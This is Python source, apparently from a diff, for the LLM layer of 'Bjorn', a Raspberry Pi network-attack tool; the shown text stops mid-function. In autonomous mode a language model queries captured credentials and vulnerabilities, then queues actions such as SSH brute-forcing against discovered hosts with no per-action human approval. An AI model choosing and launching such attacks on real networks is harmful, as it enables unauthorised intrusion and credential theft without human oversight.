tools = _BJORN_TOOLS if self._cfg("llm_chat_tools_enabled", False) else None
response = self.complete(messages, system=system, tools=tools)

if response:
with self._hist_lock:
self._chat_histories[session_id].append(
{"role": "assistant", "content": response}
)

return response or "No LLM backend available. Check Settings → LLM Bridge."

def clear_history(self, session_id: str = "default") -> None:
with self._hist_lock:
self._chat_histories.pop(session_id, None)

def status(self) -> Dict[str, Any]:
"""Return current bridge status for the web UI."""
with self._laruche_lock:
laruche = self._laruche_url

return {
"enabled": self._is_enabled(),
"backend": self._cfg("llm_backend", "auto"),
"laruche_url": laruche,
"laruche_discovery": self._discovery_active,
"ollama_url": self._cfg("llm_ollama_url", "http://127.0.0.1:11434"),
"ollama_model": self._cfg("llm_ollama_model", "phi3:mini"),
"api_provider": self._cfg("llm_api_provider", "anthropic"),
"api_model": self._cfg("llm_api_model", "claude-haiku-4-5-20251001"),
"api_key_set": bool(self._cfg("llm_api_key", "")),
}

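The public surface, then, is complete() for one-shot calls, chat() for per-session history, and status() for the UI. A usage sketch (prompt text and session id are illustrative):

bridge = LLMBridge()          # always the same instance (singleton __new__)
text = bridge.complete(
    [{"role": "user", "content": "One line on host 10.0.0.5"}],
    system="Answer in a single sentence.",
)
if text is None:
    text = "template fallback"   # llm_enabled off, or every backend failed

reply = bridge.chat("What did you find today?", session_id="webui")
print(bridge.status()["backend"])   # "auto" unless overridden in config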
# ------------------------------------------------------------------
|
||||
# Backend dispatcher
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _dispatch(
|
||||
self,
|
||||
backend: str,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
tools: Optional[List[Dict]] = None,
|
||||
) -> Optional[str]:
|
||||
if backend == "laruche":
|
||||
return self._call_laruche(messages, max_tokens, timeout, system)
|
||||
if backend == "ollama":
|
||||
return self._call_ollama(messages, max_tokens, timeout, system)
|
||||
if backend == "api":
|
||||
return self._call_api(messages, max_tokens, timeout, system, tools)
|
||||
return None
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# LaRuche backend (LAND /infer endpoint)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _call_laruche(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
) -> Optional[str]:
|
||||
with self._laruche_lock:
|
||||
url = self._laruche_url
|
||||
if not url:
|
||||
return None
|
||||
|
||||
# Build flat prompt string (LAND /infer expects a single prompt)
|
||||
prompt_parts = []
|
||||
if system:
|
||||
prompt_parts.append(f"[System]: {system}")
|
||||
for m in messages:
|
||||
role = m.get("role", "user").capitalize()
|
||||
prompt_parts.append(f"[{role}]: {m.get('content', '')}")
|
||||
prompt = "\n".join(prompt_parts)
|
||||
|
||||
model = self._cfg("llm_laruche_model", "") or None
|
||||
return land_protocol.infer(url, prompt, max_tokens=max_tokens, capability="llm", model=model, timeout=timeout)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Ollama backend (/api/chat)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _call_ollama(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
) -> Optional[str]:
|
||||
base = self._cfg("llm_ollama_url", "http://127.0.0.1:11434").rstrip("/")
|
||||
model = self._cfg("llm_ollama_model", "phi3:mini")
|
||||
|
||||
# Ollama /api/chat supports system messages natively
|
||||
ollama_messages = []
|
||||
if system:
|
||||
ollama_messages.append({"role": "system", "content": system})
|
||||
ollama_messages.extend(messages)
|
||||
|
||||
payload = {
|
||||
"model": model,
|
||||
"messages": ollama_messages,
|
||||
"stream": False,
|
||||
"options": {"num_predict": max_tokens},
|
||||
}
|
||||
data = json.dumps(payload).encode()
|
||||
req = urllib.request.Request(
|
||||
f"{base}/api/chat",
|
||||
data=data,
|
||||
headers={"Content-Type": "application/json"},
|
||||
method="POST",
|
||||
)
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
raw_bytes = resp.read().decode()
|
||||
except (urllib.error.URLError, socket.timeout, ConnectionError, OSError) as e:
|
||||
logger.warning(f"Ollama network error: {e}")
|
||||
return None
|
||||
try:
|
||||
body = json.loads(raw_bytes)
|
||||
except json.JSONDecodeError as e:
|
||||
logger.warning(f"Ollama returned invalid JSON: {e}")
|
||||
return None
|
||||
return body.get("message", {}).get("content") or None

    # ------------------------------------------------------------------
    # External API backend (Anthropic / OpenAI / OpenRouter)
    # ------------------------------------------------------------------

    def _call_api(
        self,
        messages: List[Dict],
        max_tokens: int,
        timeout: int,
        system: Optional[str],
        tools: Optional[List[Dict]] = None,
    ) -> Optional[str]:
        provider = self._cfg("llm_api_provider", "anthropic")
        api_key = self._cfg("llm_api_key", "")
        if not api_key:
            return None

        if provider == "anthropic":
            return self._call_anthropic(messages, max_tokens, timeout, system, api_key, tools)
        else:
            # OpenAI-compatible (openai / openrouter)
            return self._call_openai_compat(messages, max_tokens, timeout, system, api_key)

    def _call_anthropic(
        self,
        messages: List[Dict],
        max_tokens: int,
        timeout: int,
        system: Optional[str],
        api_key: str,
        tools: Optional[List[Dict]] = None,
    ) -> Optional[str]:
        """Call Anthropic Messages API with optional agentic tool-calling loop."""
        model = self._cfg("llm_api_model", "claude-haiku-4-5-20251001")
        base_url = self._cfg("llm_api_base_url", "") or "https://api.anthropic.com"
        api_url = f"{base_url.rstrip('/')}/v1/messages"
        headers = {
            "Content-Type": "application/json",
            "x-api-key": api_key,
            "anthropic-version": "2023-06-01",
        }

        current_messages = list(messages)

        for _round in range(6):  # max 5 tool-call rounds + 1 final
            payload: Dict[str, Any] = {
                "model": model,
                "max_tokens": max_tokens,
                "messages": current_messages,
            }
            if system:
                payload["system"] = system
            if tools:
                payload["tools"] = tools

            data = json.dumps(payload).encode()
            req = urllib.request.Request(api_url, data=data, headers=headers, method="POST")
            try:
                with urllib.request.urlopen(req, timeout=timeout) as resp:
                    raw_bytes = resp.read().decode()
            except (urllib.error.URLError, socket.timeout, ConnectionError, OSError) as e:
                logger.warning(f"Anthropic network error: {e}")
                return None
            try:
                body = json.loads(raw_bytes)
            except json.JSONDecodeError as e:
                logger.warning(f"Anthropic returned invalid JSON: {e}")
                return None

            stop_reason = body.get("stop_reason")
            content = body.get("content", [])

            if stop_reason != "tool_use" or not tools:
                # Final text response
                for block in content:
                    if isinstance(block, dict) and block.get("type") == "text":
                        return block.get("text") or None
                return None

            # ---- tool_use round ----
            current_messages.append({"role": "assistant", "content": content})
            tool_results = []
            for block in content:
                if isinstance(block, dict) and block.get("type") == "tool_use":
                    result_text = self._execute_tool(block["name"], block.get("input", {}))
                    logger.debug(f"Tool [{block['name']}] → {result_text[:200]}")
                    tool_results.append({
                        "type": "tool_result",
                        "tool_use_id": block["id"],
                        "content": result_text,
                    })
            if not tool_results:
                break
            current_messages.append({"role": "user", "content": tool_results})

        return None
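    # For reference, one tool round-trip in the loop above exchanges blocks of
    # this shape (Anthropic Messages API):
    #   assistant content: [{"type": "tool_use", "id": "toolu_...",
    #                        "name": "get_hosts", "input": {"alive_only": true}}]
    #   next user turn:    [{"type": "tool_result", "tool_use_id": "toolu_...",
    #                        "content": "<JSON string from _execute_tool>"}]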

    def _execute_tool(self, name: str, inputs: Dict) -> str:
        """Execute a Bjorn tool by name and return a JSON string result."""
        try:
            import mcp_server
        except Exception as e:
            return json.dumps({"error": f"mcp_server unavailable: {e}"})

        allowed: List[str] = self._cfg("mcp_allowed_tools", [])
        if name not in allowed:
            return json.dumps({"error": f"Tool '{name}' is not enabled in Bjorn MCP config."})

        try:
            if name == "get_hosts":
                return mcp_server._impl_get_hosts(inputs.get("alive_only", True))
            if name == "get_vulnerabilities":
                return mcp_server._impl_get_vulnerabilities(
                    inputs.get("host_ip") or None, inputs.get("limit", 100)
                )
            if name == "get_credentials":
                return mcp_server._impl_get_credentials(
                    inputs.get("service") or None, inputs.get("limit", 100)
                )
            if name == "get_action_history":
                return mcp_server._impl_get_action_history(
                    inputs.get("limit", 50), inputs.get("action_name") or None
                )
            if name == "get_status":
                return mcp_server._impl_get_status()
            if name == "run_action":
                action_name = inputs.get("action_name")
                target_ip = inputs.get("target_ip")
                if not action_name or not target_ip:
                    return json.dumps({"error": "run_action requires 'action_name' and 'target_ip'"})
                return mcp_server._impl_run_action(
                    action_name, target_ip, inputs.get("target_mac", "")
                )
            if name == "query_db":
                sql = inputs.get("sql")
                if not sql:
                    return json.dumps({"error": "query_db requires 'sql'"})
                return mcp_server._impl_query_db(sql, inputs.get("params"))
            return json.dumps({"error": f"Unknown tool: {name}"})
        except Exception as e:
            return json.dumps({"error": str(e)})
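    # Example: with "get_status" listed in mcp_allowed_tools,
    #   self._execute_tool("get_status", {})
    # returns the JSON string from mcp_server._impl_get_status(). Any failure
    # (disallowed name, bad inputs, tool exception) comes back as
    #   '{"error": "..."}'
    # so the model always receives a parseable tool_result.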

    def _call_openai_compat(
        self,
        messages: List[Dict],
        max_tokens: int,
        timeout: int,
        system: Optional[str],
        api_key: str,
    ) -> Optional[str]:
        """Call OpenAI-compatible API (OpenAI / OpenRouter / local)."""
        model = self._cfg("llm_api_model", "gpt-4o-mini")
        base_url = (
            self._cfg("llm_api_base_url", "")
            or "https://api.openai.com"
        )

        oai_messages = []
        if system:
            oai_messages.append({"role": "system", "content": system})
        oai_messages.extend(messages)

        payload = {
            "model": model,
            "messages": oai_messages,
            "max_tokens": max_tokens,
        }
        data = json.dumps(payload).encode()
        req = urllib.request.Request(
            f"{base_url.rstrip('/')}/v1/chat/completions",
            data=data,
            headers={
                "Content-Type": "application/json",
                "Authorization": f"Bearer {api_key}",
            },
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                raw_bytes = resp.read().decode()
        except (urllib.error.URLError, socket.timeout, ConnectionError, OSError) as e:
            logger.warning(f"OpenAI-compat network error: {e}")
            return None
        try:
            body = json.loads(raw_bytes)
        except json.JSONDecodeError as e:
            logger.warning(f"OpenAI-compat returned invalid JSON: {e}")
            return None
        return body.get("choices", [{}])[0].get("message", {}).get("content") or None
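    # For reference, the chat/completions reply parsed above looks roughly like:
    #   {"choices": [{"message": {"role": "assistant", "content": "..."},
    #                 "finish_reason": "stop"}]}
    # which is why an empty choices list or a missing content falls back to None.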

    # ------------------------------------------------------------------
    # System prompt builder
    # ------------------------------------------------------------------

    def _build_system_prompt(self) -> str:
        try:
            hosts = self._sd.target_count
            vulns = self._sd.vuln_count
            creds = self._sd.cred_count
            mode = self._sd.operation_mode
            status = getattr(self._sd, "bjorn_status_text", "IDLE")
        except Exception:
            hosts, vulns, creds, mode, status = "?", "?", "?", "?", "IDLE"

        # Use custom prompt if configured, otherwise default
        custom = str(self._cfg("llm_system_prompt_chat", "") or "").strip()
        if custom:
            base = custom
        else:
            base = (
                f"You are Bjorn, an autonomous network security AI assistant running on a Raspberry Pi. "
                f"Current state: {hosts} hosts discovered, {vulns} vulnerabilities, {creds} credentials captured. "
                f"Operation mode: {mode}. Current action: {status}. "
                f"Answer security questions concisely and technically. "
                f"You can discuss network topology, vulnerabilities, and suggest next steps. "
                f"Use brief Norse references occasionally. Never break character."
            )

        # Inject user profile if set
        user_name = str(self._cfg("llm_user_name", "") or "").strip()
        user_bio = str(self._cfg("llm_user_bio", "") or "").strip()
        if user_name:
            base += f"\nThe operator's name is {user_name}."
        if user_bio:
            base += f" {user_bio}"

        lang = self._lang_instruction()
        return base + (f" {lang}" if lang else "")
743
llm_orchestrator.py
Normal file
@@ -0,0 +1,743 @@
"""llm_orchestrator.py - LLM-driven scheduling layer (advisor or autonomous mode)."""

import json
import threading
import time
from typing import Any, Dict, List, Optional

from logger import Logger

logger = Logger(name="llm_orchestrator.py", level=20)

# Priority levels (must stay above normal scheduler/queue to be useful)
_ADVISOR_PRIORITY = 85  # advisor > MCP (80) > normal (50) > scheduler (40)
_AUTONOMOUS_PRIORITY = 82


class LLMOrchestrator:
    """
    LLM-based orchestration layer.

    advisor mode    - called from orchestrator background tasks; LLM suggests one action.
    autonomous mode - runs its own thread; LLM loops with full tool-calling.
    """

    def __init__(self, shared_data):
        self._sd = shared_data
        self._thread: Optional[threading.Thread] = None
        self._stop = threading.Event()
        self._last_fingerprint: Optional[tuple] = None

    # ------------------------------------------------------------------
    # Lifecycle
    # ------------------------------------------------------------------

    def start(self) -> None:
        mode = self._mode()
        if mode == "autonomous":
            if self._thread and self._thread.is_alive():
                return
            self._stop.clear()
            self._thread = threading.Thread(
                target=self._autonomous_loop, daemon=True, name="LLMOrchestrator"
            )
            self._thread.start()
            logger.info("LLM Orchestrator started (autonomous)")
        elif mode == "advisor":
            logger.info("LLM Orchestrator ready (advisor - called from background tasks)")

    def stop(self) -> None:
        self._stop.set()
        if self._thread and self._thread.is_alive():
            self._thread.join(timeout=15)
        self._thread = None

    def restart_if_mode_changed(self) -> None:
        """
        Call from the orchestrator main loop to react to runtime config changes.
        Starts/stops the autonomous thread when the mode changes.
        """
        mode = self._mode()
        running = self._thread is not None and self._thread.is_alive()

        if mode == "autonomous" and not running and self._is_llm_enabled():
            self.start()
        elif mode != "autonomous" and running:
            self.stop()

    def is_active(self) -> bool:
        return self._thread is not None and self._thread.is_alive()

    # ------------------------------------------------------------------
    # Config helpers
    # ------------------------------------------------------------------

    def _mode(self) -> str:
        return str(self._sd.config.get("llm_orchestrator_mode", "none"))

    def _is_llm_enabled(self) -> bool:
        return bool(self._sd.config.get("llm_enabled", False))

    def _allowed_actions(self) -> List[str]:
        """
        Bjorn action module names the LLM may queue via run_action.
        Falls back to all loaded action names if empty.
        NOTE: These are action MODULE names (e.g. 'NetworkScanner', 'SSHBruteforce'),
        NOT MCP tool names (get_hosts, run_action, etc.).
        """
        custom = self._sd.config.get("llm_orchestrator_allowed_actions", [])
        if custom:
            return list(custom)
        # Auto-discover from loaded actions
        try:
            loaded = getattr(self._sd, 'loaded_action_names', None)
            if loaded:
                return list(loaded)
        except Exception:
            pass
        # Fallback: ask the DB for known action names
        try:
            rows = self._sd.db.query(
                "SELECT DISTINCT action_name FROM action_queue ORDER BY action_name"
            )
            if rows:
                return [r["action_name"] for r in rows]
        except Exception:
            pass
        return []

    def _max_actions(self) -> int:
        return max(1, int(self._sd.config.get("llm_orchestrator_max_actions", 3)))

    def _interval(self) -> int:
        return max(30, int(self._sd.config.get("llm_orchestrator_interval_s", 60)))

    # ------------------------------------------------------------------
    # Advisor mode (called externally from orchestrator background tasks)
    # ------------------------------------------------------------------

    def advise(self) -> Optional[str]:
        """
        Ask the LLM for ONE tactical action recommendation.
        Returns the action name if one was queued, else None.
        """
        if not self._is_llm_enabled() or self._mode() != "advisor":
            return None

        try:
            from llm_bridge import LLMBridge

            allowed = self._allowed_actions()
            if not allowed:
                return None

            snapshot = self._build_snapshot()
            real_ips = snapshot.get("VALID_TARGET_IPS", [])
            ip_list_str = ", ".join(real_ips) if real_ips else "(none)"

            system = (
                "You are Bjorn's tactical advisor. Review the current network state "
                "and suggest ONE action to queue, or nothing if the queue is sufficient. "
                "Reply ONLY with valid JSON - no markdown, no commentary.\n"
                'Format when action needed: {"action": "ActionName", "target_ip": "1.2.3.4", "reason": "brief"}\n'
                'Format when nothing needed: {"action": null}\n'
                "action must be exactly one of: " + ", ".join(allowed) + "\n"
                f"target_ip MUST be one of these exact IPs: {ip_list_str}\n"
                "NEVER use placeholder IPs. Only use IPs from the hosts_alive list."
            )
            prompt = (
                f"Current Bjorn state:\n{json.dumps(snapshot, indent=2)}\n\n"
                "Suggest one action or null."
            )

            raw = LLMBridge().complete(
                [{"role": "user", "content": prompt}],
                system=system,
                max_tokens=150,
                timeout=20,
            )
            if not raw:
                return None

            return self._apply_advisor_response(raw, allowed)

        except Exception as e:
            logger.debug(f"LLM advisor error: {e}")
            return None

    def _apply_advisor_response(self, raw: str, allowed: List[str]) -> Optional[str]:
        """Parse advisor JSON and queue the suggested action. Returns action name or None."""
        try:
            text = raw.strip()
            # Strip markdown fences if the model added them
            if "```" in text:
                parts = text.split("```")
                text = parts[1] if len(parts) > 1 else parts[0]
                if text.startswith("json"):
                    text = text[4:]

            data = json.loads(text.strip())
            action = data.get("action")
            if not action:
                logger.debug("LLM advisor: no action suggested this cycle")
                return None

            if action not in allowed:
                logger.warning(f"LLM advisor suggested disallowed action '{action}' - ignored")
                return None

            target_ip = str(data.get("target_ip", "")).strip()
            reason = str(data.get("reason", "llm_advisor"))[:120]

            mac = self._resolve_mac(target_ip)

            self._sd.db.queue_action(
                action_name=action,
                mac=mac,
                ip=target_ip,
                priority=_ADVISOR_PRIORITY,
                trigger="llm_advisor",
                metadata={
                    "decision_method": "llm_advisor",
                    "decision_origin": "llm",
                    "ai_reason": reason,
                },
            )
            try:
                self._sd.queue_event.set()
            except Exception:
                pass

            logger.info(f"[LLM_ADVISOR] → {action} @ {target_ip}: {reason}")
            return action

        except json.JSONDecodeError:
            logger.warning(f"LLM advisor: invalid JSON response: {raw[:200]}")
            return None
        except Exception as e:
            logger.debug(f"LLM advisor apply error: {e}")
            return None
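    # Example advisor round-trip (values illustrative): given a snapshot whose
    # VALID_TARGET_IPS contains "192.168.1.23", a reply of
    #   {"action": "NetworkScanner", "target_ip": "192.168.1.23", "reason": "unscanned host"}
    # queues NetworkScanner at priority 85 (_ADVISOR_PRIORITY), while
    #   {"action": null}
    # queues nothing and the cycle ends quietly.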

    # ------------------------------------------------------------------
    # Autonomous mode (own thread)
    # ------------------------------------------------------------------

    def _autonomous_loop(self) -> None:
        logger.info("LLM Orchestrator autonomous loop starting")
        while not self._stop.is_set():
            try:
                if self._is_llm_enabled() and self._mode() == "autonomous":
                    self._run_autonomous_cycle()
                else:
                    # Mode was switched off at runtime - stop thread
                    break
            except Exception as e:
                logger.error(f"LLM autonomous cycle error: {e}")

            self._stop.wait(self._interval())

        logger.info("LLM Orchestrator autonomous loop stopped")

    def _compute_fingerprint(self) -> tuple:
        """
        Compact state fingerprint: (hosts, vulns, creds, last_completed_queue_id).
        Only increases are meaningful - a host going offline is not an opportunity.
        """
        try:
            hosts = int(getattr(self._sd, "target_count", 0))
            vulns = int(getattr(self._sd, "vuln_count", 0))
            creds = int(getattr(self._sd, "cred_count", 0))
            row = self._sd.db.query_one(
                "SELECT MAX(id) AS mid FROM action_queue WHERE status IN ('success','failed')"
            )
            last_id = int(row["mid"]) if row and row["mid"] is not None else 0
            return (hosts, vulns, creds, last_id)
        except Exception:
            return (0, 0, 0, 0)

    def _has_actionable_change(self, fp: tuple) -> bool:
        """
        Return True only if something *increased* since the last cycle:
          - new host discovered      (hosts ↑)
          - new vulnerability found  (vulns ↑)
          - new credential captured  (creds ↑)
          - an action completed      (last_id ↑)
        A host going offline (hosts ↓) is not an actionable event.
        """
        if self._last_fingerprint is None:
            return True  # first cycle always runs
        return any(fp[i] > self._last_fingerprint[i] for i in range(len(fp)))
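    # Worked example: last fingerprint (5, 2, 0, 41) vs current (4, 2, 0, 41)
    # -> a host dropped offline, nothing increased, so the cycle is skipped
    # (no tokens spent). Current (4, 3, 0, 41) -> a new vulnerability, cycle runs.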

    def _run_autonomous_cycle(self) -> None:
        """
        One autonomous cycle.

        Two paths based on backend capability:
          A) API backend (Anthropic) → agentic tool-calling loop
          B) LaRuche / Ollama → snapshot-based JSON prompt (no tool-calling)

        Path B injects the full network state into the prompt and asks the LLM
        to reply with a JSON array of actions. This works with any text-only LLM.
        """
        # Skip if nothing actionable changed (save tokens)
        if self._sd.config.get("llm_orchestrator_skip_if_no_change", True):
            fp = self._compute_fingerprint()
            if not self._has_actionable_change(fp):
                logger.debug("LLM autonomous: no actionable change, skipping cycle (no tokens used)")
                return
            self._last_fingerprint = fp

        try:
            from llm_bridge import LLMBridge, _BJORN_TOOLS
        except ImportError as e:
            logger.warning(f"LLM Orchestrator: cannot import llm_bridge: {e}")
            return

        bridge = LLMBridge()
        allowed = self._allowed_actions()
        max_act = self._max_actions()

        # Detect if the active backend supports tool-calling
        backend = self._sd.config.get("llm_backend", "auto")
        supports_tools = (backend == "api") or (
            backend == "auto" and not bridge._laruche_url
            and not self._ollama_reachable()
        )

        if supports_tools:
            response = self._cycle_with_tools(bridge, allowed, max_act)
        else:
            response = self._cycle_without_tools(bridge, allowed, max_act)

        if response:
            log_reasoning = self._sd.config.get("llm_orchestrator_log_reasoning", False)
            prompt_desc = f"Autonomous cycle (tools={'yes' if supports_tools else 'no'})"
            if log_reasoning:
                logger.info(f"[LLM_ORCH_REASONING]\n{response}")
                self._push_to_chat(bridge, prompt_desc, response)
            else:
                logger.info(f"[LLM_AUTONOMOUS] {response[:300]}")

    def _ollama_reachable(self) -> bool:
        """Quick check if Ollama is up (for backend detection)."""
        try:
            base = self._sd.config.get("llm_ollama_url", "http://127.0.0.1:11434").rstrip("/")
            import urllib.request
            urllib.request.urlopen(f"{base}/api/tags", timeout=2)
            return True
        except Exception:
            return False

    # ------ Path A: agentic tool-calling (Anthropic API only) ------

    def _cycle_with_tools(self, bridge, allowed: List[str], max_act: int) -> Optional[str]:
        """Full agentic loop: LLM calls MCP tools and queues actions."""
        from llm_bridge import _BJORN_TOOLS

        read_only = {"get_hosts", "get_vulnerabilities", "get_credentials",
                     "get_action_history", "get_status", "query_db"}
        tools = [
            t for t in _BJORN_TOOLS
            if t["name"] in read_only or t["name"] == "run_action"
        ]

        system = self._build_autonomous_system_prompt(allowed, max_act)
        prompt = (
            "Start a new orchestration cycle. "
            "Use get_status and get_hosts to understand the current state. "
            f"Then queue up to {max_act} high-value action(s) via run_action. "
            "When done, summarise what you queued and why."
        )

        return bridge.complete(
            [{"role": "user", "content": prompt}],
            system=system,
            tools=tools,
            max_tokens=1000,
            timeout=90,
        )

    # ------ Path B: snapshot + JSON parsing (LaRuche / Ollama) ------

    def _cycle_without_tools(self, bridge, allowed: List[str], max_act: int) -> Optional[str]:
        """
        No tool-calling: inject state snapshot into prompt, ask LLM for JSON actions.
        Parse the response and queue actions ourselves.
        """
        snapshot = self._build_snapshot()
        allowed_str = ", ".join(allowed) if allowed else "none"

        # Extract the real IP list so we can stress it in the prompt
        real_ips = snapshot.get("VALID_TARGET_IPS", [])
        ip_list_str = ", ".join(real_ips) if real_ips else "(no hosts discovered yet)"

        # Short system prompt - small models forget long instructions
        system = (
            "You are a network security orchestrator. "
            "You receive network scan data and output a JSON array of actions. "
            "Output ONLY a JSON array. No explanations, no markdown, no commentary."
        )

        # Put the real instructions in the user message AFTER the data,
        # so the model sees them last (recency bias helps small models).
        prompt = (
            f"Network state:\n{json.dumps(snapshot, indent=2)}\n\n"
            "---\n"
            f"Pick up to {max_act} actions from: {allowed_str}\n"
            f"Target IPs MUST be from this list: {ip_list_str}\n"
            "Match actions to open ports. Skip hosts already in pending_queue.\n"
            "Output ONLY a JSON array like:\n"
            '[{"action":"ActionName","target_ip":"1.2.3.4","reason":"brief"}]\n'
            "or [] if nothing needed.\n"
            "JSON array:"
        )

        # Use an assistant prefix to force the model into JSON mode.
        # Many LLMs will continue from this prefix rather than describe.
        messages = [
            {"role": "user", "content": prompt},
            {"role": "assistant", "content": "["},
        ]

        raw = bridge.complete(
            messages,
            system=system,
            max_tokens=500,
            timeout=60,
        )

        # Prepend the '[' prefix we forced if the model didn't include it
        if raw and not raw.strip().startswith("["):
            raw = "[" + raw

        if not raw:
            return None

        # Parse and queue actions
        queued = self._parse_and_queue_actions(raw, allowed, max_act)

        summary = raw.strip()
        if queued:
            summary += f"\n\n[Orchestrator queued {len(queued)} action(s): {', '.join(queued)}]"
        else:
            summary += "\n\n[Orchestrator: no valid actions parsed from LLM response]"

        return summary
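    # Example of the prefix trick (action name illustrative): with the assistant
    # turn primed to "[", a small model typically continues with
    #   {"action":"SSHBruteforce","target_ip":"192.168.1.23","reason":"open 22"}]
    # and the guard above re-attaches the "[" for backends that return only the
    # continuation rather than echoing the prefix.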

    @staticmethod
    def _is_valid_ip(ip: str) -> bool:
        """Check that ip is a real IPv4 address (no placeholders like 192.168.1.x)."""
        parts = ip.split(".")
        if len(parts) != 4:
            return False
        for p in parts:
            try:
                n = int(p)
                if n < 0 or n > 255:
                    return False
            except ValueError:
                return False  # catches 'x', 'xx', etc.
        return True
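    # _is_valid_ip("192.168.1.23") -> True
    # _is_valid_ip("192.168.1.x")  -> False (placeholder octet)
    # _is_valid_ip("10.0.0.300")   -> False (octet out of range)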

    def _parse_and_queue_actions(self, raw: str, allowed: List[str], max_act: int) -> List[str]:
        """Parse JSON array from LLM response and queue valid actions. Returns list of queued action names."""
        queued = []
        try:
            text = raw.strip()
            # Strip markdown fences
            if "```" in text:
                parts = text.split("```")
                text = parts[1] if len(parts) > 1 else parts[0]
                if text.startswith("json"):
                    text = text[4:]
            text = text.strip()

            # Try to find JSON array in the text
            start = text.find("[")
            end = text.rfind("]")
            if start == -1 or end == -1:
                # Check if the model wrote a text description instead of JSON
                if any(text.lower().startswith(w) for w in ("this ", "here", "the ", "based", "from ", "i ")):
                    logger.warning(
                        "LLM autonomous: model returned a text description instead of JSON array. "
                        "The model may not support structured output. First 120 chars: "
                        + text[:120]
                    )
                else:
                    logger.debug(f"LLM autonomous: no JSON array found in response: {text[:120]}")
                return []

            data = json.loads(text[start:end + 1])
            if not isinstance(data, list):
                data = [data]

            for item in data[:max_act]:
                if not isinstance(item, dict):
                    continue
                action = item.get("action", "").strip()
                target_ip = str(item.get("target_ip", "")).strip()
                reason = str(item.get("reason", "llm_autonomous"))[:120]

                if not action or action not in allowed:
                    logger.debug(f"LLM autonomous: skipping invalid/disallowed action '{action}'")
                    continue
                if not target_ip:
                    logger.debug(f"LLM autonomous: skipping '{action}' - no target_ip")
                    continue
                if not self._is_valid_ip(target_ip):
                    logger.warning(
                        f"LLM autonomous: skipping '{action}' - invalid/placeholder IP '{target_ip}' "
                        f"(LLM must use exact IPs from alive_hosts)"
                    )
                    continue

                mac = self._resolve_mac(target_ip)
                if not mac:
                    logger.warning(
                        f"LLM autonomous: skipping '{action}' @ {target_ip} - "
                        f"IP not found in hosts table (LLM used an IP not in alive_hosts)"
                    )
                    continue

                self._sd.db.queue_action(
                    action_name=action,
                    mac=mac,
                    ip=target_ip,
                    priority=_AUTONOMOUS_PRIORITY,
                    trigger="llm_autonomous",
                    metadata={
                        "decision_method": "llm_autonomous",
                        "decision_origin": "llm",
                        "ai_reason": reason,
                    },
                )
                queued.append(f"{action}@{target_ip}")
                logger.info(f"[LLM_AUTONOMOUS] → {action} @ {target_ip} (mac={mac}): {reason}")

            if queued:
                try:
                    self._sd.queue_event.set()
                except Exception:
                    pass

        except json.JSONDecodeError as e:
            logger.debug(f"LLM autonomous: JSON parse error: {e} - raw: {raw[:200]}")
        except Exception as e:
            logger.debug(f"LLM autonomous: action queue error: {e}")

        return queued

    def _build_autonomous_system_prompt(self, allowed: List[str], max_act: int) -> str:
        try:
            hosts = getattr(self._sd, "target_count", "?")
            vulns = getattr(self._sd, "vuln_count", "?")
            creds = getattr(self._sd, "cred_count", "?")
            mode = getattr(self._sd, "operation_mode", "?")
        except Exception:
            hosts = vulns = creds = mode = "?"

        allowed_str = ", ".join(allowed) if allowed else "none"

        lang = ""
        try:
            from llm_bridge import LLMBridge
            lang = LLMBridge()._lang_instruction()
        except Exception:
            pass

        return (
            "You are Bjorn's Cyberviking autonomous orchestrator, running on a Raspberry Pi network security tool. "
            f"Current state: {hosts} hosts discovered, {vulns} vulnerabilities, {creds} credentials. "
            f"Operation mode: {mode}. "
            "Your objective: observe the network state via tools, then queue the most valuable actions. "
            f"Hard limit: at most {max_act} run_action calls per cycle. "
            f"Only these action names may be queued: {allowed_str}. "
            "Strategy: prioritise unexplored services, hosts with high port counts, and hosts with no recent scans. "
            "Do not queue duplicate actions already pending or recently successful. "
            "Use Norse references occasionally. Be terse and tactical."
            + (f" {lang}" if lang else "")
        )

    # ------------------------------------------------------------------
    # Shared helpers
    # ------------------------------------------------------------------

    def _push_to_chat(self, bridge, user_prompt: str, assistant_response: str) -> None:
        """
        Inject the LLM's reasoning into the 'llm_orchestrator' chat session
        so it can be reviewed in chat.html (load session 'llm_orchestrator').
        Keeps last 40 messages to avoid unbounded memory.
        """
        try:
            with bridge._hist_lock:
                hist = bridge._chat_histories.setdefault("llm_orchestrator", [])
                hist.append({"role": "user", "content": f"[Autonomous cycle]\n{user_prompt}"})
                hist.append({"role": "assistant", "content": assistant_response})
                if len(hist) > 40:
                    hist[:] = hist[-40:]
        except Exception as e:
            logger.debug(f"LLM reasoning push to chat failed: {e}")

    def _resolve_mac(self, ip: str) -> str:
        """Resolve IP → MAC from hosts table. Column is 'ips' (may hold multiple IPs)."""
        if not ip:
            return ""
        try:
            row = self._sd.db.query_one(
                "SELECT mac_address FROM hosts WHERE ips LIKE ? LIMIT 1", (f"%{ip}%",)
            )
            return row["mac_address"] if row else ""
        except Exception:
            return ""

    def _build_snapshot(self) -> Dict[str, Any]:
        """
        Rich state snapshot for advisor / autonomous prompts.

        Includes:
          - hosts_alive           : full host details (ip, mac, hostname, vendor, ports)
          - services_detected     : identified services per host (port, service, product, version)
          - vulnerabilities_found : active vulnerabilities per host
          - credentials_captured  : captured credentials per host/service
          - available_actions     : what the LLM can queue (name, description, target port/service)
          - pending_queue         : actions already queued
          - recent_actions        : last completed actions (avoid repeats)
        """
        hosts, services, vulns, creds = [], [], [], []
        actions_catalog, pending, history = [], [], []

        # ── Alive hosts ──
        try:
            rows = self._sd.db.query(
                "SELECT mac_address, ips, hostnames, ports, vendor "
                "FROM hosts WHERE alive=1 LIMIT 30"
            )
            for r in (rows or []):
                ip = (r.get("ips") or "").split(";")[0].strip()
                if not ip:
                    continue
                hosts.append({
                    "ip": ip,
                    "mac": r.get("mac_address", ""),
